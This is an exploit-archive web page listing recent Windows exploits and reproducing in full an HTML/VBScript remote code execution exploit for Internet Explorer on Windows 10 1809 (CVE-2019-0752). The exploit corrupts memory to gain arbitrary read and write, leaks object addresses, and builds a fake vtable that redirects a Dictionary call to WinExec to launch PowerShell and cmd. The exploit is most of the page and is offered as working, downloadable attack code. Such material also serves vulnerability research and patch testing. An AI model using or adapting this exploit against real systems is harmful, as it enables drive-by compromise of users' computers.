Menu

Improved exploit search engine. Try it out

"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption"

Author

"Simon Zuckerbraun"

Platform

windows

Release date

2019-05-24

Release Date Title Type Platform Author
2019-06-14 "Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow" local windows "Nipun Jaswal"
2019-06-13 "Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation" local windows PovlTekstTV
2019-06-11 "ProShow 9.0.3797 - Local Privilege Escalation" local windows Yonatan_Correa
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-06-07 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)" local windows SandboxEscaper
2019-06-03 "Nvidia GeForce Experience Web Helper - Command Injection" local windows "Rhino Security Labs"
2019-06-04 "DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)" local windows "Kevin Randall"
2014-11-24 "Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)" local windows anonymous
2019-05-30 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service" dos windows n1xbyte
2019-05-28 "Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass" remote windows "Faudhzan Rahman"
2019-05-23 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)" local windows SandboxEscaper
2019-05-29 "Free SMTP Server 2.5 - Denial of Service (PoC)" dos windows "Metin Yunus Kandemir"
2019-05-27 "Pidgin 2.13.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46928/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46928/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46928/41342/microsoft-internet-explorer-windows-10-1809-17763316-scripting-engine-memory-corruption/download/", "exploit_id": "46928", "exploit_description": "\"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption\"", "exploit_date": "2019-05-24", "exploit_author": "\"Simon Zuckerbraun\"", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
<!-- all the way to RCE using no shellcode.                                                     -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
<!--    (h/t: James Forshaw, Google Project Zero)                                               -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
	<div id="container1" style="overflow:scroll; width: 10px">
		<div id="content1" style="width:5000000px">
			Content
		</div>
	</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
	Private mValue
	Public Property Let Value(v)
		mValue = v
	End Property
	Public Default Property Get P
		P = mValue				' Where to write
	End Property
End Class
Sub TriggerWrite(where, val)
	Dim v1
	Set v1 = document.getElementById("container1")
	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
	Dim c
	Set c = new MyClass
	c.Value = where
	Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
	TriggerWrite addr    , (val) AND &hff
	TriggerWrite addr + 1, (val\&h100) AND &hff
	TriggerWrite addr + 2, (val\&h10000) AND &hff
	TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
	For i = 0 To Len(str) - 1
		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
	Next
End Sub
Function ReadInt32(addr)
	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
	ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
	Set ar1(gremlin + 1) = obj
	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
	' Corrupt vt of one array element (the "gremlin")
	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
		If Not IsEmpty(ar1(i)) Then
			gremlin = i
			Exit For
		End If
	Next
	
	If IsEmpty(gremlin) Then
		MsgBox "Could not find gremlin"
		Exit Sub
	End If
	
	For i = 0 To UBound(ar2)
		Set ar2(i) = CreateObject("Scripting.Dictionary")
	Next
	
	Set dict = ar2(UBound(ar2) / 2)
	addressOfDict = LeakAddressOfObject(dict)
	vtableOfDict = ReadInt32(addressOfDict)
	scrrun = vtableOfDict - &h11fc
	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
	winExec = kernel32 + &h5d380
	
	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
	' Relocate pld to ensure its address doesn't contain a null byte
	pld = ReadInt32(addressOfDict + &h3c)
	fakePld = &h28281020
	For i = 0 To 3 - 1
		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
	Next
	
	fakeVtable = &h28282828		' ASCII "(((("
	For i = 0 To 21
		If i = 12 Then		' Dictionary.Exists
			fptr = winExec
		Else
			fptr = ReadInt32(vtableOfDict + 4 * i)
		End If
		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
	Next
	
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
	
	On Error Resume Next
	dict.Exists "dummy"		' Wheeee!!
	
	' A little cleanup to help prevent crashes after the exploit
	For i = 1 To 3
		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
	Next
	Erase Dict
	Erase ar2
End Sub
Exploit
</script>
</body>
</html>